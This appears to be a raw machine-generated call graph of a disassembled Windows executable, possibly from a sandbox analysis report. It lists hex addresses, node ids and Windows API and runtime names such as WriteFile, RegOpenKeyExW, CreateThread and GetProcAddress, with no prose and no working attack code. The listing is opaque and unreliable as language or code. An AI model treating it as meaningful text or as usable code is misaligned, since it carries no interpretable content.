102449 370a27 __fcloseall 102449->102412 102451 370a89 102584 370ab5 LeaveCriticalSection __unlock_fhandle 102451->102584 102453->102403 102454->102402 102456 36d892 __fcloseall 102455->102456 102457 36d8b6 102456->102457 102458 36d89f 102456->102458 102459 36d955 102457->102459 102461 36d8ca 102457->102461 102556 368af4 58 API calls __getptd_noexit 102458->102556 102562 368af4 58 API calls __getptd_noexit 102459->102562 102464 36d8f2 102461->102464 102465 36d8e8 102461->102465 102463 36d8a4 102557 368b28 58 API calls __getptd_noexit 102463->102557 102483 36d206 102464->102483 102558 368af4 58 API calls __getptd_noexit 102465->102558 102466 36d8ed 102563 368b28 58 API calls __getptd_noexit 102466->102563 102468 36d8ab __fcloseall 102468->102419 102471 36d8f8 102473 36d91e 102471->102473 102474 36d90b 102471->102474 102559 368b28 58 API calls __getptd_noexit 102473->102559 102492 36d975 102474->102492 102475 36d961 102564 368db6 9 API calls ___strgtold12_l 102475->102564 102479 36d923 102560 368af4 58 API calls __getptd_noexit 102479->102560 102481 36d917 102561 36d94d LeaveCriticalSection __unlock_fhandle 102481->102561 102484 36d212 __fcloseall 102483->102484 102485 36d261 EnterCriticalSection 102484->102485 102486 369c0b __lock 58 API calls 102484->102486 102487 36d287 __fcloseall 102485->102487 102488 36d237 102486->102488 102487->102471 102489 369e2b ___lock_fhandle InitializeCriticalSectionAndSpinCount 102488->102489 102491 36d24f 102488->102491 102489->102491 102490 36d28b ___lock_fhandle LeaveCriticalSection 102490->102485 102491->102490 102493 36d982 __ftell_nolock 102492->102493 102494 36d9e0 102493->102494 102495 36d9c1 102493->102495 102524 36d9b6 102493->102524 102499 36da38 102494->102499 102500 36da1c 102494->102500 102496 368af4 __close 58 API calls 102495->102496 102498 36d9c6 102496->102498 102497 36c5f6 __fputwc_nolock 6 API calls 102501 36e1d6 102497->102501 102502 368b28 __lseek_nolock 58 API calls 102498->102502 102503 36da51 102499->102503 102506 3718c1 __lseeki64_nolock 60 API calls 102499->102506 102504 368af4 __close 58 API calls 102500->102504 102501->102481 102505 36d9cd 102502->102505 102507 375c6b __stbuf 58 API calls 102503->102507 102508 36da21 102504->102508 102509 368db6 ___strgtold12_l 9 API calls 102505->102509 102506->102503 102510 36da5f 102507->102510 102511 368b28 __lseek_nolock 58 API calls 102508->102511 102509->102524 102512 36ddb8 102510->102512 102517 3699ac ____lc_codepage_func 58 API calls 102510->102517 102513 36da28 102511->102513 102514 36ddd6 102512->102514 102515 36e14b WriteFile 102512->102515 102516 368db6 ___strgtold12_l 9 API calls 102513->102516 102518 36ddec 102514->102518 102519 36defa 102514->102519 102520 36ddab GetLastError 102515->102520 102526 36dd78 102515->102526 102516->102524 102522 36da8b GetConsoleMode 102517->102522 102523 36de5b WriteFile 102518->102523 102531 36e184 102518->102531 102521 36df05 102519->102521 102539 36dfef 102519->102539 102520->102526 102521->102531 102535 36df6a WriteFile 102521->102535 102522->102512 102527 36daca 102522->102527 102523->102520 102529 36de98 102523->102529 102524->102497 102525 368b28 __lseek_nolock 58 API calls 102530 36e1b2 102525->102530 102526->102524 102526->102531 102532 36ded8 102526->102532 102527->102512 102528 36dada GetConsoleCP 102527->102528 102528->102531 102554 36db09 102528->102554 102529->102518 102534 36debc 102529->102534 102536 368af4 __close 58 API calls 102530->102536 102531->102524 102531->102525 102537 36dee3 102532->102537 102538 36e17b 102532->102538 102533 36e064 WideCharToMultiByte 102533->102520 102548 36e0ab 102533->102548 102534->102526 102535->102520 102540 36dfb9 102535->102540 102536->102524 102541 368b28 __lseek_nolock 58 API calls 102537->102541 102542 368b07 __dosmaperr 58 API calls 102538->102542 102539->102531 102539->102533 102540->102521 102540->102526 102540->102534 102544 36dee8 102541->102544 102542->102524 102543 36e0b3 WriteFile 102546 36e106 GetLastError 102543->102546 102543->102548 102547 368af4 __close 58 API calls 102544->102547 102545 3635f5 __write_nolock 58 API calls 102545->102554 102546->102548 102547->102524 102548->102526 102548->102534 102548->102539 102548->102543 102549 3762ba 60 API calls __write_nolock 102549->102554 102550 377a5e WriteConsoleW CreateFileW __putwch_nolock 102553 36dc5f 102550->102553 102551 36dbf2 WideCharToMultiByte 102551->102526 102552 36dc2d WriteFile 102551->102552 102552->102520 102552->102553 102553->102520 102553->102526 102553->102550 102553->102554 102555 36dc87 WriteFile 102553->102555 102554->102526 102554->102545 102554->102549 102554->102551 102554->102553 102555->102520 102555->102553 102556->102463 102557->102468 102558->102466 102559->102479 102560->102481 102561->102468 102562->102466 102563->102475 102564->102468 102588 36d4c3 102565->102588 102567 370aeb 102568 370b41 102567->102568 102569 370b1f 102567->102569 102571 36d4c3 __lseek_nolock 58 API calls 102567->102571 102601 36d43d 59 API calls 2 library calls 102568->102601 102569->102568 102572 36d4c3 __lseek_nolock 58 API calls 102569->102572 102575 370b16 102571->102575 102576 370b2b CloseHandle 102572->102576 102573 370b49 102574 370b6b 102573->102574 102602 368b07 58 API calls 3 library calls 102573->102602 102574->102451 102578 36d4c3 __lseek_nolock 58 API calls 102575->102578 102576->102568 102579 370b37 GetLastError 102576->102579 102578->102569 102579->102568 102580->102435 102581->102449 102582->102438 102583->102451 102584->102449 102585->102438 102586->102444 102587->102449 102589 36d4ce 102588->102589 102590 36d4e3 102588->102590 102591 368af4 __close 58 API calls 102589->102591 102592 368af4 __close 58 API calls 102590->102592 102595 36d508 102590->102595 102593 36d4d3 102591->102593 102596 36d512 102592->102596 102594 368b28 __lseek_nolock 58 API calls 102593->102594 102597 36d4db 102594->102597 102595->102567 102598 368b28 __lseek_nolock 58 API calls 102596->102598 102597->102567 102599 36d51a 102598->102599 102600 368db6 ___strgtold12_l 9 API calls 102599->102600 102600->102597 102601->102573 102602->102574 102665 371940 102603->102665 102606 34477c 102608 347bcc 59 API calls 102606->102608 102607 344799 102671 347d8c 102607->102671 102610 344788 102608->102610 102667 347726 102610->102667 102613 360791 102614 36079e __ftell_nolock 102613->102614 102615 36079f GetLongPathNameW 102614->102615 102616 347bcc 59 API calls 102615->102616 102617 3472bd 102616->102617 102618 34700b 102617->102618 102619 347667 59 API calls 102618->102619 102620 34701d 102619->102620 102621 344750 60 API calls 102620->102621 102622 347028 102621->102622 102623 347033 102622->102623 102626 37e885 102622->102626 102625 343f74 59 API calls 102623->102625 102627 34703f 102625->102627 102628 37e89f 102626->102628 102685 347908 61 API calls 102626->102685 102679 3434c2 102627->102679 102630 347052 Mailbox 102630->101442 102632 344ddd 136 API calls 102631->102632 102633 34688f 102632->102633 102634 37e031 102633->102634 102636 344ddd 136 API calls 102633->102636 102635 3a955b 122 API calls 102634->102635 102637 37e046 102635->102637 102638 3468a3 102636->102638 102639 37e067 102637->102639 102640 37e04a 102637->102640 102638->102634 102641 3468ab 102638->102641 102643 360db6 Mailbox 59 API calls 102639->102643 102642 344e4a 84 API calls 102640->102642 102644 3468b7 102641->102644 102645 37e052 102641->102645 102642->102645 102664 37e0ac Mailbox 102643->102664 102686 346a8c 102644->102686 102779 3a42f8 90 API calls _wprintf 102645->102779 102649 37e060 102649->102639 102650 37e260 102651 362d55 _free 58 API calls 102650->102651 102652 37e268 102651->102652 102653 344e4a 84 API calls 102652->102653 102658 37e271 102653->102658 102657 362d55 _free 58 API calls 102657->102658 102658->102657 102659 344e4a 84 API calls 102658->102659 102785 39f7a1 89 API calls 4 library calls 102658->102785 102659->102658 102661 347de1 59 API calls 102661->102664 102664->102650 102664->102658 102664->102661 102780 39f73d 59 API calls 2 library calls 102664->102780 102781 39f65e 61 API calls 2 library calls 102664->102781 102782 3a737f 59 API calls Mailbox 102664->102782 102783 34750f 59 API calls 2 library calls 102664->102783 102784 34735d 59 API calls Mailbox 102664->102784 102666 34475d GetFullPathNameW 102665->102666 102666->102606 102666->102607 102668 347734 102667->102668 102675 347d2c 102668->102675 102670 344794 102670->102613 102672 347da6 102671->102672 102673 347d99 102671->102673 102674 360db6 Mailbox 59 API calls 102672->102674 102673->102610 102674->102673 102676 347d43 _memmove 102675->102676 102677 347d3a 102675->102677 102676->102670 102677->102676 102678 347e4f 59 API calls 102677->102678 102678->102676 102681 3434d4 102679->102681 102684 3434f3 _memmove 102679->102684 102680 360db6 Mailbox 59 API calls 102683 34350a 102680->102683 102682 360db6 Mailbox 59 API calls 102681->102682 102682->102684 102683->102630 102684->102680 102685->102626 102687 346ab5 102686->102687 102688 37e41e 102686->102688 102791 3457a6 60 API calls Mailbox 102687->102791 102858 39f7a1 89 API calls 4 library calls 102688->102858 102691 346ad7 102792 3457f6 67 API calls 102691->102792 102692 37e431 102859 39f7a1 89 API calls 4 library calls 102692->102859 102694 346aec 102694->102692 102696 346af4 102694->102696 102698 347667 59 API calls 102696->102698 102697 37e44d 102700 346b61 102697->102700 102699 346b00 102698->102699 102793 360957 60 API calls __ftell_nolock 102699->102793 102702 37e460 102700->102702 102703 346b6f 102700->102703 102706 345c6f CloseHandle 102702->102706 102707 347667 59 API calls 102703->102707 102704 346b0c 102705 347667 59 API calls 102704->102705 102708 346b18 102705->102708 102709 37e46c 102706->102709 102710 346b78 102707->102710 102711 344750 60 API calls 102708->102711 102712 344ddd 136 API calls 102709->102712 102713 347667 59 API calls 102710->102713 102714 346b26 102711->102714 102715 37e488 102712->102715 102716 346b81 102713->102716 102794 345850 ReadFile SetFilePointerEx 102714->102794 102718 37e4b1 102715->102718 102722 3a955b 122 API calls 102715->102722 102796 34459b 102716->102796 102860 39f7a1 89 API calls 4 library calls 102718->102860 102721 346b52 102795 345aee SetFilePointerEx SetFilePointerEx 102721->102795 102726 37e4a4 102722->102726 102723 346b98 102727 347b2e 59 API calls 102723->102727 102724 37e4c8 102758 346d0c Mailbox 102724->102758 102729 37e4cd 102726->102729 102730 37e4ac 102726->102730 102728 346ba9 SetCurrentDirectoryW 102727->102728 102735 346bbc Mailbox 102728->102735 102731 344e4a 84 API calls 102729->102731 102732 344e4a 84 API calls 102730->102732 102733 37e4d2 102731->102733 102732->102718 102734 360db6 Mailbox 59 API calls 102733->102734 102741 37e506 102734->102741 102737 360db6 Mailbox 59 API calls 102735->102737 102739 346bcf 102737->102739 102738 343bbb 102738->101303 102738->101327 102740 34522e 59 API calls 102739->102740 102753 346bda Mailbox __wsetenvp 102740->102753 102861 34750f 59 API calls 2 library calls 102741->102861 102743 346ce7 102854 345c6f 102743->102854 102746 37e740 102867 3a72df 59 API calls Mailbox 102746->102867 102747 346cf3 SetCurrentDirectoryW 102747->102758 102750 37e762 102868 3bfbce 59 API calls 2 library calls 102750->102868 102753->102743 102755 37e7d9 102753->102755 102764 37e7d1 102753->102764 102767 347de1 59 API calls 102753->102767 102847 34586d 67 API calls _wcscpy 102753->102847 102848 346f5d GetStringTypeW 102753->102848 102849 346ecc 60 API calls __wcsnicmp 102753->102849 102850 346faa GetStringTypeW __wsetenvp 102753->102850 102851 36363d GetStringTypeW _iswctype 102753->102851 102852 3468dc 165 API calls 3 library calls 102753->102852 102853 347213 59 API calls Mailbox 102753->102853 102754 37e76f 102756 362d55 _free 58 API calls 102754->102756 102871 39f7a1 89 API calls 4 library calls 102755->102871 102756->102758 102786 3457d4 102758->102786 102761 37e7f2 102761->102743 102762 37e54f Mailbox 102762->102746 102770 347de1 59 API calls 102762->102770 102774 37e792 102762->102774 102862 39f73d 59 API calls 2 library calls 102762->102862 102863 39f65e 61 API calls 2 library calls 102762->102863 102864 3a737f 59 API calls Mailbox 102762->102864 102865 34750f 59 API calls 2 library calls 102762->102865 102866 347213 59 API calls Mailbox 102762->102866 102870 39f5f7 59 API calls 4 library calls 102764->102870 102767->102753 102770->102762 102869 39f7a1 89 API calls 4 library calls 102774->102869 102776 37e7ab 102777 362d55 _free 58 API calls 102776->102777 102778 37e7be 102777->102778 102778->102758 102779->102649 102780->102664 102781->102664 102782->102664 102783->102664 102784->102664 102785->102658 102787 345c6f CloseHandle 102786->102787 102788 3457dc Mailbox 102787->102788 102789 345c6f CloseHandle 102788->102789 102790 3457eb 102789->102790 102790->102738 102791->102691 102792->102694 102793->102704 102794->102721 102795->102700 102797 347667 59 API calls 102796->102797 102798 3445b1 102797->102798 102799 347667 59 API calls 102798->102799 102800 3445b9 102799->102800 102801 347667 59 API calls 102800->102801 102802 3445c1 102801->102802 102803 347667 59 API calls 102802->102803 102804 3445c9 102803->102804 102805 37d4d2 102804->102805 102806 3445fd 102804->102806 102807 348047 59 API calls 102805->102807 102808 34784b 59 API calls 102806->102808 102809 37d4db 102807->102809 102810 34460b 102808->102810 102811 347d8c 59 API calls 102809->102811 102812 347d2c 59 API calls 102810->102812 102813 344640 102811->102813 102814 344615 102812->102814 102816 344680 102813->102816 102817 34465f 102813->102817 102829 37d4fb 102813->102829 102814->102813 102815 34784b 59 API calls 102814->102815 102818 344636 102815->102818 102872 34784b 102816->102872 102822 3479f2 59 API calls 102817->102822 102821 347d2c 59 API calls 102818->102821 102820 37d5cb 102825 347bcc 59 API calls 102820->102825 102821->102813 102826 344669 102822->102826 102823 344691 102824 3446a3 102823->102824 102827 348047 59 API calls 102823->102827 102828 3446b3 102824->102828 102830 348047 59 API calls 102824->102830 102842 37d588 102825->102842 102826->102816 102833 34784b 59 API calls 102826->102833 102827->102824 102832 3446ba 102828->102832 102834 348047 59 API calls 102828->102834 102829->102820 102831 37d5b4 102829->102831 102841 37d532 102829->102841 102830->102828 102831->102820 102837 37d59f 102831->102837 102835 348047 59 API calls 102832->102835 102844 3446c1 Mailbox 102832->102844 102833->102816 102834->102832 102835->102844 102836 3479f2 59 API calls 102836->102842 102840 347bcc 59 API calls 102837->102840 102838 37d590 102839 347bcc 59 API calls 102838->102839 102839->102842 102840->102842 102841->102838 102845 37d57b 102841->102845 102842->102816 102842->102836 102885 347924 59 API calls 2 library calls 102842->102885 102844->102723 102846 347bcc 59 API calls 102845->102846 102846->102842 102847->102753 102848->102753 102849->102753 102850->102753 102851->102753 102852->102753 102853->102753 102855 345c88 102854->102855 102856 345c79 102854->102856 102855->102856 102857 345c8d CloseHandle 102855->102857 102856->102747 102857->102856 102858->102692 102859->102697 102860->102724 102861->102762 102862->102762 102863->102762 102864->102762 102865->102762 102866->102762 102867->102750 102868->102754 102869->102776 102870->102755 102871->102761 102873 3478b7 102872->102873 102874 34785a 102872->102874 102876 347d2c 59 API calls 102873->102876 102874->102873 102875 347865 102874->102875 102878 347880 102875->102878 102879 37eb09 102875->102879 102877 347888 _memmove 102876->102877 102877->102823 102886 347f27 59 API calls Mailbox 102878->102886 102887 348029 102879->102887 102882 37eb13 102883 360db6 Mailbox 59 API calls 102882->102883 102884 37eb33 102883->102884 102885->102842 102886->102877 102888 360db6 Mailbox 59 API calls 102887->102888 102889 348033 102888->102889 102889->102882 102890->101453 102892 346d95 102891->102892 102897 346ea9 102891->102897 102893 360db6 Mailbox 59 API calls 102892->102893 102892->102897 102895 346dbc 102893->102895 102894 360db6 Mailbox 59 API calls 102896 346e31 102894->102896 102895->102894 102896->102897 102904 346240 102896->102904 102929 34735d 59 API calls Mailbox 102896->102929 102930 396553 59 API calls Mailbox 102896->102930 102931 34750f 59 API calls 2 library calls 102896->102931 102897->101457 102902->101459 102903->101461 102932 347a16 102904->102932 102906 34646a 102939 34750f 59 API calls 2 library calls 102906->102939 102908 346484 Mailbox 102908->102896 102911 37dff6 102942 39f8aa 91 API calls 4 library calls 102911->102942 102912 34750f 59 API calls 102922 346265 102912->102922 102916 37e004 102943 34750f 59 API calls 2 library calls 102916->102943 102917 347d8c 59 API calls 102917->102922 102919 37e01a 102919->102908 102920 346799 _memmove 102944 39f8aa 91 API calls 4 library calls 102920->102944 102921 37df92 102923 348029 59 API calls 102921->102923 102922->102906 102922->102911 102922->102912 102922->102917 102922->102920 102922->102921 102926 347e4f 59 API calls 102922->102926 102937 345f6c 60 API calls 102922->102937 102938 345d41 59 API calls Mailbox 102922->102938 102940 345e72 60 API calls 102922->102940 102941 347924 59 API calls 2 library calls 102922->102941 102925 37df9d 102923->102925 102928 360db6 Mailbox 59 API calls 102925->102928 102927 34643b CharUpperBuffW 102926->102927 102927->102922 102928->102920 102929->102896 102930->102896 102931->102896 102933 360db6 Mailbox 59 API calls 102932->102933 102934 347a3b 102933->102934 102935 348029 59 API calls 102934->102935 102936 347a4a 102935->102936 102936->102922 102937->102922 102938->102922 102939->102908 102940->102922 102941->102922 102942->102916 102943->102919 102944->102908 102945->101475 102946->101476 102948 344196 102947->102948 102949 37d423 102947->102949 102948->101482 102973 3a2f94 62 API calls _W_store_winword 102948->102973 102949->102948 102950 37d42c DestroyIcon 102949->102950 102950->102948 102952 34416f Mailbox 102951->102952 102953 344098 102951->102953 102952->101488 102954 347a16 59 API calls 102953->102954 102955 3440a6 102954->102955 102973->101482 102975 34e6d5 102974->102975 102976 383aa9 102975->102976 102979 34e73f 102975->102979 102987 34e799 102975->102987 103144 349ea0 102976->103144 102982 347667 59 API calls 102979->102982 102979->102987 102980 347667 59 API calls 102980->102987 102984 383b04 102982->102984 102983 362d40 __cinit 67 API calls 102983->102987 102986 362d40 __cinit 67 API calls 102984->102986 102985 383b26 102985->101565 102986->102987 102987->102980 102987->102983 102987->102985 102989 34e95a 102987->102989 103004 34e970 Mailbox 102987->103004 102988 3484c0 69 API calls 102988->103004 102989->103004 103169 3a9e4a 89 API calls 4 library calls 102989->103169 102991 349ea0 331 API calls 102991->103004 102995 3a9e4a 89 API calls 102995->103004 102996 348d40 59 API calls 102996->103004 103001 383e25 103001->101565 103002 34f195 103173 3a9e4a 89 API calls 4 library calls 103002->103173 103003 34ea78 103003->101565 103004->102988 103004->102991 103004->102995 103004->102996 103004->103002 103004->103003 103143 347f77 59 API calls 2 library calls 103004->103143 103170 396e8f 59 API calls 103004->103170 103171 3bc5c3 331 API calls 103004->103171 103172 3bb53c 331 API calls Mailbox 103004->103172 103174 349c90 59 API calls Mailbox 103004->103174 103175 3b93c6 331 API calls Mailbox 103004->103175 103006 34f650 103005->103006 103007 34f4ba 103005->103007 103008 347de1 59 API calls 103006->103008 103009 34f4c6 103007->103009 103010 38441e 103007->103010 103016 34f58c Mailbox 103008->103016 103274 34f290 331 API calls 2 library calls 103009->103274 103276 3bbc6b 331 API calls Mailbox 103010->103276 103013 38442c 103017 34f630 103013->103017 103277 3a9e4a 89 API calls 4 library calls 103013->103277 103015 34f4fd 103015->103013 103015->103016 103015->103017 103023 344e4a 84 API calls 103016->103023 103182 3b445a 103016->103182 103191 3a3c37 103016->103191 103194 3acb7a 103016->103194 103017->101565 103019 34f5e3 103019->103017 103275 349c90 59 API calls Mailbox 103019->103275 103023->103019 103403 348180 103024->103403 103026 34fd3d 103027 3506f6 103026->103027 103028 38472d 103026->103028 103408 34f234 103026->103408 103424 3a9e4a 89 API calls 4 library calls 103027->103424 103425 3a9e4a 89 API calls 4 library calls 103028->103425 103032 384742 103104->101565 103105->101565 103106->101495 103107->101500 103108->101565 103109->101502 103110->101502 103111->101502 103112->101565 103113->101565 103114->101565 103116 349851 103115->103116 103127 34984b 103115->103127 103117 37f5d3 __i64tow 103116->103117 103118 349899 103116->103118 103120 349857 __itow 103116->103120 103123 37f4da 103116->103123 103445 363698 83 API calls 4 library calls 103118->103445 103122 360db6 Mailbox 59 API calls 103120->103122 103124 349871 103122->103124 103125 360db6 Mailbox 59 API calls 103123->103125 103131 37f552 Mailbox _wcscpy 103123->103131 103126 347de1 59 API calls 103124->103126 103124->103127 103129 37f51f 103125->103129 103126->103127 103127->101565 103128 360db6 Mailbox 59 API calls 103130 37f545 103128->103130 103129->103128 103130->103131 103446 363698 83 API calls 4 library calls 103131->103446 103133->101565 103134->101565 103135->101565 103136->101549 103137->101549 103138->101549 103139->101549 103140->101549 103141->101549 103142->101549 103143->103004 103145 349ebf 103144->103145 103159 349eed Mailbox 103144->103159 103146 360db6 Mailbox 59 API calls 103145->103146 103146->103159 103147 362d40 67 API calls __cinit 103147->103159 103148 34b475 103149 348047 59 API calls 103148->103149 103158 34a057 103149->103158 103150 34b47a 103152 380055 103150->103152 103153 347667 59 API calls 103153->103159 103157 348047 59 API calls 103157->103159 103159->103147 103159->103148 103159->103150 103159->103152 103159->103153 103159->103157 103159->103158 103161 360db6 59 API calls Mailbox 103159->103161 103164 396e8f 59 API calls 103159->103164 103165 3809d6 103159->103165 103167 34a55a 103159->103167 103176 34c8c0 331 API calls 2 library calls 103159->103176 103177 34b900 60 API calls Mailbox 103159->103177 103161->103159 103164->103159 103169->103004 103170->103004 103171->103004 103172->103004 103173->103001 103174->103004 103175->103004 103176->103159 103177->103159 103183 349837 84 API calls 103182->103183 103184 3b4494 103183->103184 103279 3a445a GetFileAttributesW 103191->103279 103195 347667 59 API calls 103194->103195 103196 3acbaf 103195->103196 103274->103015 103275->103019 103276->103013 103277->103017 103280 3a3c3e 103279->103280 103281 3a4475 FindFirstFileW 103279->103281 103280->103019 103281->103280 103404 34818f 103403->103404 103407 3481aa 103403->103407 103405 347e4f 59 API calls 103404->103405 103406 348197 CharUpperBuffW 103405->103406 103406->103407 103407->103026 103409 34f251 103408->103409 103424->103028 103425->103032 103445->103120 103446->103117 103459 341055 103464 342649 103459->103464 103462 362d40 __cinit 67 API calls 103463 341064 103462->103463 103465 347667 59 API calls 103464->103465 103466 3426b7 103465->103466 103471 343582 103466->103471 103469 342754 103470 34105a 103469->103470 103474 343416 59 API calls 2 library calls 103469->103474 103470->103462 103475 3435b0 103471->103475 103474->103469 103476 3435bd 103475->103476 103477 3435a1 103475->103477 103476->103477 103478 3435c4 RegOpenKeyExW 103476->103478 103477->103469 103478->103477 103479 3435de RegQueryValueExW 103478->103479 103480 343614 RegCloseKey 103479->103480 103481 3435ff 103479->103481 103480->103477 103481->103480 103482 341016 103487 344974 103482->103487 103485 362d40 __cinit 67 API calls 103486 341025 103485->103486 103488 360db6 Mailbox 59 API calls 103487->103488 103489 34497c 103488->103489 103490 34101b 103489->103490 103494 344936 103489->103494 103490->103485 103495 344951 103494->103495 103496 34493f 103494->103496 103498 3449a0 103495->103498 103497 362d40 __cinit 67 API calls 103496->103497 103497->103495 103499 347667 59 API calls 103498->103499 103500 3449b8 GetVersionExW 103499->103500 103501 347bcc 59 API calls 103500->103501 103502 3449fb 103501->103502 103503 347d2c 59 API calls 103502->103503 103511 344a28 103502->103511 103504 344a1c 103503->103504 103505 347726 59 API calls 103504->103505 103505->103511 103506 344a93 GetCurrentProcess IsWow64Process 103507 344aac 103506->103507 103509 344ac2 103507->103509 103510 344b2b GetSystemInfo 103507->103510 103508 37d864 103522 344b37 103509->103522 103512 344af8 103510->103512 103511->103506 103511->103508 103512->103490 103515 344ad4 103518 344b37 2 API calls 103515->103518 103516 344b1f GetSystemInfo 103517 344ae9 103516->103517 103517->103512 103520 344aef FreeLibrary 103517->103520 103519 344adc GetNativeSystemInfo 103518->103519 103519->103517 103520->103512 103523 344ad0 103522->103523 103524 344b40 LoadLibraryA 103522->103524 103523->103515 103523->103516 103524->103523 103525 344b51 GetProcAddress 103524->103525 103525->103523 103526 341066 103531 34f76f 103526->103531 103528 34106c 103529 362d40 __cinit 67 API calls 103528->103529 103530 341076 103529->103530 103532 34f790 103531->103532 103564 35ff03 103532->103564 103536 34f7d7 103537 347667 59 API calls 103536->103537 103538 34f7e1 103537->103538 103539 347667 59 API calls 103538->103539 103540 34f7eb 103539->103540 103541 347667 59 API calls 103540->103541 103542 34f7f5 103541->103542 103543 347667 59 API calls 103542->103543 103544 34f833 103543->103544 103545 347667 59 API calls 103544->103545 103546 34f8fe 103545->103546 103574 355f87 103546->103574 103550 34f930 103551 347667 59 API calls 103550->103551 103552 34f93a 103551->103552 103602 35fd9e 103552->103602 103554 34f981 103555 34f991 GetStdHandle 103554->103555 103556 3845ab 103555->103556 103557 34f9dd 103555->103557 103556->103557 103559 3845b4 103556->103559 103558 34f9e5 OleInitialize 103557->103558 103558->103528 103609 3a6b38 64 API calls Mailbox 103559->103609 103561 3845bb 103610 3a7207 CreateThread 103561->103610 103563 3845c7 CloseHandle 103563->103558 103611 35ffdc 103564->103611 103567 35ffdc 59 API calls 103568 35ff45 103567->103568 103569 347667 59 API calls 103568->103569 103570 35ff51 103569->103570 103571 347bcc 59 API calls 103570->103571 103572 34f796 103571->103572 103573 360162 6 API calls 103572->103573 103573->103536 103575 347667 59 API calls 103574->103575 103576 355f97 103575->103576 103577 347667 59 API calls 103576->103577 103578 355f9f 103577->103578 103618 355a9d 103578->103618 103581 355a9d 59 API calls 103582 355faf 103581->103582 103583 347667 59 API calls 103582->103583 103584 355fba 103583->103584 103585 360db6 Mailbox 59 API calls 103584->103585 103586 34f908 103585->103586 103587 3560f9 103586->103587 103588 356107 103587->103588 103589 347667 59 API calls 103588->103589 103590 356112 103589->103590 103591 347667 59 API calls 103590->103591 103592 35611d 103591->103592 103593 347667 59 API calls 103592->103593 103594 356128 103593->103594 103595 347667 59 API calls 103594->103595 103596 356133 103595->103596 103597 355a9d 59 API calls 103596->103597 103598 35613e 103597->103598 103599 360db6 Mailbox 59 API calls 103598->103599 103600 356145 RegisterWindowMessageW 103599->103600 103600->103550 103603 39576f 103602->103603 103604 35fdae 103602->103604 103621 3a9ae7 60 API calls 103603->103621 103605 360db6 Mailbox 59 API calls 103604->103605 103607 35fdb6 103605->103607 103607->103554 103608 39577a 103609->103561 103610->103563 103622 3a71ed 65 API calls 103610->103622 103612 347667 59 API calls 103611->103612 103613 35ffe7 103612->103613 103614 347667 59 API calls 103613->103614 103615 35ffef 103614->103615 103616 347667 59 API calls 103615->103616 103617 35ff3b 103616->103617 103617->103567 103619 347667 59 API calls 103618->103619 103620 355aa5 103619->103620 103620->103581 103621->103608 103623 343633 103624 34366a 103623->103624 103625 3436e7 103624->103625 103626 343688 103624->103626 103627 3436e5 103624->103627 103631 3436ed 103625->103631 103632 37d0cc 103625->103632 103628 343695 103626->103628 103629 34374b PostQuitMessage 103626->103629 103630 3436ca DefWindowProcW 103627->103630 103636 37d154 103628->103636 103637 3436a0 103628->103637 103638 3436d8 103629->103638 103630->103638 103633 343715 SetTimer RegisterWindowMessageW 103631->103633 103634 3436f2 103631->103634 103672 351070 10 API calls Mailbox 103632->103672 103633->103638 103642 34373e CreatePopupMenu 103633->103642 103639 37d06f 103634->103639 103640 3436f9 KillTimer 103634->103640 103677 3a2527 71 API calls _memset 103636->103677 103643 343755 103637->103643 103644 3436a8 103637->103644 103652 37d074 103639->103652 103653 37d0a8 MoveWindow 103639->103653 103668 34443a Shell_NotifyIconW _memset 103640->103668 103641 37d0f3 103673 351093 331 API calls Mailbox 103641->103673 103642->103638 103670 3444a0 64 API calls _memset 103643->103670 103648 3436b3 103644->103648 103649 37d139 103644->103649 103655 3436be 103648->103655 103656 37d124 103648->103656 103649->103630 103676 397c36 59 API calls Mailbox 103649->103676 103650 37d166 103650->103630 103650->103638 103658 37d097 SetFocus 103652->103658 103659 37d078 103652->103659 103653->103638 103654 34370c 103669 343114 DeleteObject DestroyWindow Mailbox 103654->103669 103655->103630 103674 34443a Shell_NotifyIconW _memset 103655->103674 103675 3a2d36 81 API calls _memset 103656->103675 103657 343764 103657->103638 103658->103638 103659->103655 103663 37d081 103659->103663 103671 351070 10 API calls Mailbox 103663->103671 103666 37d118 103667 34434a 68 API calls 103666->103667 103667->103627 103668->103654 103669->103638 103670->103657 103671->103638 103672->103641 103673->103655 103674->103666 103675->103657 103676->103627 103677->103650 103678 38416f 103682 395fe6 103678->103682 103680 38417a 103681 395fe6 85 API calls 103680->103681 103681->103680 103683 396020 103682->103683 103687 395ff3 103682->103687 103683->103680 103684 396022 103694 349328 84 API calls Mailbox 103684->103694 103685 396027 103688 349837 84 API calls 103685->103688 103687->103683 103687->103684 103687->103685 103691 39601a 103687->103691 103689 39602e 103688->103689 103690 347b2e 59 API calls 103689->103690 103690->103683 103693 3495a0 59 API calls _wcsstr 103691->103693 103693->103683 103694->103685 103695 34107d 103700 34708b 103695->103700 103697 34108c 103698 362d40 __cinit 67 API calls 103697->103698 103699 341096 103698->103699 103701 34709b __ftell_nolock 103700->103701 103702 347667 59 API calls 103701->103702 103703 347151 103702->103703 103704 344706 61 API calls 103703->103704 103705 34715a 103704->103705 103731 36050b 103705->103731 103708 347cab 59 API calls 103709 347173 103708->103709 103710 343f74 59 API calls 103709->103710 103711 347182 103710->103711 103712 347667 59 API calls 103711->103712 103713 34718b 103712->103713 103714 347d8c 59 API calls 103713->103714 103715 347194 RegOpenKeyExW 103714->103715 103716 37e8b1 RegQueryValueExW 103715->103716 103719 3471b6 Mailbox 103715->103719 103717 37e943 RegCloseKey 103716->103717 103718 37e8ce 103716->103718 103717->103719 103730 37e955 _wcscat Mailbox __wsetenvp 103717->103730 103720 360db6 Mailbox 59 API calls 103718->103720 103719->103697 103721 37e8e7 103720->103721 103722 34522e 59 API calls 103721->103722 103723 37e8f2 RegQueryValueExW 103722->103723 103724 37e90f 103723->103724 103727 37e929 103723->103727 103725 347bcc 59 API calls 103724->103725 103725->103727 103726 3479f2 59 API calls 103726->103730 103727->103717 103728 347de1 59 API calls 103728->103730 103729 343f74 59 API calls 103729->103730 103730->103719 103730->103726 103730->103728 103730->103729 103732 371940 __ftell_nolock 103731->103732 103733 360518 GetFullPathNameW 103732->103733 103734 36053a 103733->103734 103735 347bcc 59 API calls 103734->103735 103736 347165 103735->103736 103736->103708 103737 37fdfc 103771 34ab30 Mailbox _memmove 103737->103771 103743 380055 103803 3a9e4a 89 API calls 4 library calls 103743->103803 103745 360db6 59 API calls Mailbox 103758 349f37 Mailbox 103745->103758 103748 34b475 103752 348047 59 API calls 103748->103752 103749 348047 59 API calls 103749->103758 103750 380064 103761 34a057 103752->103761 103754 34b47a 103754->103743 103764 3809e5 103754->103764 103756 347667 59 API calls 103756->103758 103757 362d40 67 API calls __cinit 103757->103758 103758->103743 103758->103745 103758->103748 103758->103749 